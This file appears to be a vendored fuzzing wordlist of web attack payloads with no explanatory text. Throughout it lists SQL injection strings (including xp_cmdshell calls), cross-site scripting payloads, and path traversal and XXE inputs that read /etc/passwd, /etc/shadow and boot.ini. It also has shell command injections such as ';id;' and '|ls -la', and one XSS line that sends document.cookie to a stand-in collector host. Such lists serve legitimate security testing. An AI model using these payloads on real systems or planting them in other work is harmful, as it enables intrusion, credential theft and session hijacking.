467 lines
10 KiB
Plaintext
Vendored
467 lines
10 KiB
Plaintext
Vendored
00
|
|
0
|
|
0 or 1=1
|
|
0xfffffff
|
|
1
|
|
1.0
|
|
1;SELECT%20*
|
|
2
|
|
65536
|
|
268435455
|
|
2147483647
|
|
!
|
|
!'
|
|
!@#0%^#0##018387@#0^^**(()
|
|
!@#$%%^#$%#$@#$%$$@#$%^^**(()
|
|
"
|
|
"' or 1 --'"
|
|
") or ("a"="a
|
|
"><script>"
|
|
"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>
|
|
">xxx<P>yyy
|
|
"\t"
|
|
" or 0=0 #
|
|
" or 0=0 --
|
|
" or 1=1 or ""="
|
|
" or 1=1--
|
|
" or "a"="a
|
|
" or "x"="x
|
|
#
|
|
#
|
|
#'
|
|
#'
|
|
#xA
|
|
#xA#xD
|
|
#xD
|
|
#xD#xA
|
|
$NULL
|
|
$null
|
|
%
|
|
%00
|
|
%00
|
|
%00
|
|
%00../../../../../../etc/passwd
|
|
%00../../../../../../etc/shadow
|
|
%00/
|
|
%00/etc/passwd%00
|
|
%00/etc/shadow%00
|
|
%0a
|
|
%0a/bin/cat%20/etc/passwd
|
|
%0a/bin/cat%20/etc/shadow
|
|
%0d%0aX-Injection-Header:%20AttackValue
|
|
%01%02%03%04%0a%0d%0aADSF
|
|
%01%02%03%04%0a%0d%0aADSF
|
|
%2A
|
|
%2A%7C
|
|
%2A%28%7C%28mail%3D%2A%29%29
|
|
%2A%28%7C%28objectclass%3D%2A%29%29
|
|
%2C
|
|
%2e%2e%2f
|
|
%3C
|
|
%3C%3F
|
|
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
|
|
%3cscript%3ealert("XSS");%3c/script%3e
|
|
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
|
|
%5C
|
|
%5C/
|
|
%7C
|
|
%7C
|
|
%20
|
|
%20$(sleep%2050)
|
|
%20'sleep%2050'
|
|
%20|
|
|
%21
|
|
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
|
|
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
|
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
|
|
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
|
|
%26
|
|
%27%20or%201=1
|
|
%28
|
|
%29
|
|
%60
|
|
%250a
|
|
%2500
|
|
&
|
|
|
|
|
|
|
|
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
'
|
|
'%20OR
|
|
<
|
|
<
|
|
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
|
|
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
|
|
<>"'%;)(&+
|
|
<script>alert(document.cookie);<script>alert
|
|
<script>alert(document.cookie);</script>
|
|
";id"
|
|
'
|
|
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
|
|
'%20or%201=1
|
|
'';!--"<XSS>=&{()}
|
|
' (select top 1
|
|
') or ('a'='a
|
|
') or ('x'='x
|
|
' --
|
|
' ;
|
|
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
|
|
'; exec master..xp_cmdshell
|
|
'; exec xp_regread
|
|
'><script>alert(document.cookie);</script>
|
|
'><script>alert(document.cookie)</script>
|
|
' UNION ALL SELECT
|
|
' UNION SELECT
|
|
'hi' or 'x'='x';
|
|
' or 0=0 #
|
|
' or 0=0 --
|
|
' or 1=1 or ''='
|
|
' or 1=1 or ''='
|
|
' or 1=1--
|
|
' or '1'='1'--
|
|
' or ''='
|
|
' or ''='
|
|
' or 'x'='x
|
|
' or (EXISTS)
|
|
' or a=a--
|
|
'or select *
|
|
' or uid like '%
|
|
' or uname like '%
|
|
' or userid like '%
|
|
' or user like '%
|
|
' or username like '%
|
|
'sqlattempt1
|
|
'||UTL_HTTP.REQUEST
|
|
(
|
|
(')
|
|
(sqlattempt2)
|
|
)
|
|
*
|
|
*'
|
|
*'
|
|
*(|(mail=*))
|
|
*(|(objectclass=*))
|
|
*/*
|
|
*|
|
|
*|
|
|
+%00
|
|
,@variable
|
|
-
|
|
-
|
|
-1
|
|
-1.0
|
|
-2
|
|
-20
|
|
-268435455
|
|
--
|
|
--
|
|
--';
|
|
--sp_password
|
|
..%5c
|
|
..%25%35%63
|
|
..%255c
|
|
..%%35%63
|
|
..%%35c
|
|
..%bg%qf
|
|
..%c0%af
|
|
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
|
|
..%u2215
|
|
..%u2216
|
|
../
|
|
../../../../../../../../../../../../boot.ini
|
|
../../../../../../../../../../../../boot.ini%00
|
|
../../../../../../../../../../../../etc/hosts
|
|
../../../../../../../../../../../../etc/hosts%00
|
|
../../../../../../../../../../../../etc/passwd
|
|
../../../../../../../../../../../../etc/passwd%00
|
|
../../../../../../../../../../../../etc/shadow
|
|
../../../../../../../../../../../../etc/shadow%00
|
|
../../../../../../../../../../../../localstart.asp
|
|
../../../../../../../../../../../../localstart.asp%00
|
|
../../../../../../../../conf/server.xml
|
|
../../boot.ini
|
|
..\
|
|
..\..\..\..\..\..\..\..\..\..\boot.ini
|
|
..\..\..\..\..\..\..\..\..\..\boot.ini%00
|
|
..\..\..\..\..\..\..\..\..\..\etc\passwd
|
|
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
|
..\..\..\..\..\..\..\..\..\..\etc\shadow
|
|
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
|
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
|
|
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
|
|
/
|
|
/
|
|
/%00/
|
|
/%2A
|
|
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
|
|
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
|
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
|
|
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
|
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
|
|
/'
|
|
/'
|
|
/,%ENV,/
|
|
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
|
|
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
|
|
/.../.../.../.../.../
|
|
/../../../../../../../../%2A
|
|
/../../../../../../../../../../../boot.ini
|
|
/../../../../../../../../../../../boot.ini%00
|
|
/../../../../../../../../../../../boot.ini%00.html
|
|
/../../../../../../../../../../../boot.ini%00.jpg
|
|
/../../../../../../../../../../../etc/passwd%00.html
|
|
/../../../../../../../../../../../etc/passwd%00.jpg
|
|
/../../../../../../../../../../etc/passwd
|
|
/../../../../../../../../../../etc/passwd^^
|
|
/../../../../../../../../../../etc/shadow
|
|
/../../../../../../../../../../etc/shadow^^
|
|
/../../../../../../../../bin/id|
|
|
/..\../..\../..\../..\../..\../..\../boot.ini
|
|
/..\../..\../..\../..\../..\../..\../etc/passwd
|
|
/..\../..\../..\../..\../..\../..\../etc/shadow
|
|
/./././././././././././boot.ini
|
|
/./././././././././././etc/passwd
|
|
/./././././././././././etc/shadow
|
|
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
|
|
//
|
|
//*
|
|
/boot.ini
|
|
/etc/passwd
|
|
/etc/shadow
|
|
/index.html|id|
|
|
;
|
|
;dir
|
|
;id;
|
|
;ls -la
|
|
;netstat -a;
|
|
;read;
|
|
<
|
|
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
|
|
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
|
|
<<
|
|
<<<
|
|
<<script>alert("XSS");//<</script>
|
|
<>"'%;)(&+
|
|
<?
|
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
|
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
|
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
|
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
|
|
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
|
|
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
|
|
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
|
|
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
|
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
|
|
<IMG%20SRC='javascript:alert(document.cookie)'>
|
|
<IMG%20SRC='javasc ript:alert(document.cookie)'>
|
|
<IMG DYNSRC="javascript:alert('XSS')">
|
|
<IMG LOWSRC="javascript:alert('XSS')">
|
|
<IMG SRC="  javascript:alert('XSS');">
|
|
<IMG SRC="jav
ascript:alert('XSS');">
|
|
<IMG SRC="jav
ascript:alert('XSS');">
|
|
<IMG SRC="jav	ascript:alert('XSS');">
|
|
<IMG SRC="javascript:alert('XSS')"
|
|
<IMG SRC="javascript:alert('XSS');">
|
|
<IMG SRC="jav ascript:alert('XSS');">
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
|
<IMG SRC=`javascript:alert("'XSS'")`>
|
|
<IMG SRC=javascript:alert("XSS")>
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
|
<name>','')); phpinfo(); exit;/*</name>
|
|
< script > < / script>
|
|
<script>alert("XSS")</script>
|
|
<script>alert(document.cookie)</script>
|
|
<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
|
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
|
|
<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
|
<xss><script>alert('XSS')</script></vulnerable>
|
|
= '
|
|
= --
|
|
= ;
|
|
?x=
|
|
?x="
|
|
?x=>
|
|
?x=|
|
|
@'
|
|
@'
|
|
@*
|
|
@variable
|
|
A
|
|
ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
|
|
C:/boot.ini
|
|
C:/inetpub/wwwroot/global.asa
|
|
C:\boot.ini
|
|
C:\inetpub\wwwroot\global.asa
|
|
FALSE
|
|
NULL
|
|
PRINT
|
|
PRINT @@variable
|
|
TRUE
|
|
[']
|
|
[']
|
|
\
|
|
\00
|
|
\00
|
|
\00\00
|
|
\00\00\00
|
|
\0
|
|
\0
|
|
\0\0
|
|
\0\0\0
|
|
\";alert('XSS');//
|
|
\"blah
|
|
\'
|
|
\'
|
|
\..\..\..\..\..\..\..\..\..\..\boot.ini
|
|
\..\..\..\..\..\..\..\..\..\..\etc\passwd
|
|
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
|
\..\..\..\..\..\..\..\..\..\..\etc\shadow
|
|
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
|
\\
|
|
\\'/bin/cat%20/etc/passwd\\'
|
|
\\'/bin/cat%20/etc/shadow\\'
|
|
\\/
|
|
\\\\*
|
|
\\\\?\\
|
|
\n/bin/ls -al\n
|
|
\nnetstat -a%\n
|
|
\t
|
|
\u003C
|
|
\u003c
|
|
\x3C
|
|
\x3D \x3B'
|
|
\x3D \x27
|
|
\x3c
|
|
\x23
|
|
\x27
|
|
\x27UNION SELECT
|
|
\x27\x4F\x52 SELECT *
|
|
\x27\x6F\x72 SELECT *
|
|
^'
|
|
^'
|
|
`
|
|
`dir`
|
|
`id`
|
|
admin'--
|
|
as
|
|
asc
|
|
bfilename
|
|
char%4039%41%2b%40SELECT
|
|
count(/child::node())
|
|
delete
|
|
desc
|
|
distinct
|
|
exec sp
|
|
exec xp
|
|
handler
|
|
having
|
|
hi") or ("a"="a
|
|
hi" or 1=1 --
|
|
hi" or "a"="a
|
|
hi') or ('a'='a
|
|
hi' or 1=1 --
|
|
hi' or 'a'='a
|
|
id%00
|
|
id%00|
|
|
insert
|
|
like
|
|
limit
|
|
null
|
|
or
|
|
or 0=0 #
|
|
or 0=0 --
|
|
or 1=1--
|
|
or%201=1
|
|
or%201=1 --
|
|
order by
|
|
procedure
|
|
replace
|
|
select
|
|
something%00html
|
|
t'exec master..xp_cmdshell 'nslookup www.google.com'--
|
|
to_timestamp_tz
|
|
truncate
|
|
tz_offset
|
|
update
|
|
x' or 1=1 or 'x'='y
|
|
x' or name()='username' or 'x'='y
|
|
{'}
|
|
{'}
|
|
|
|
|
|
|
|
|/bin/ls -al
|
|
|dir
|
|
|dir|
|
|
|id
|
|
|id|
|
|
|ls
|
|
|ls -la
|
|
||
|
|
} |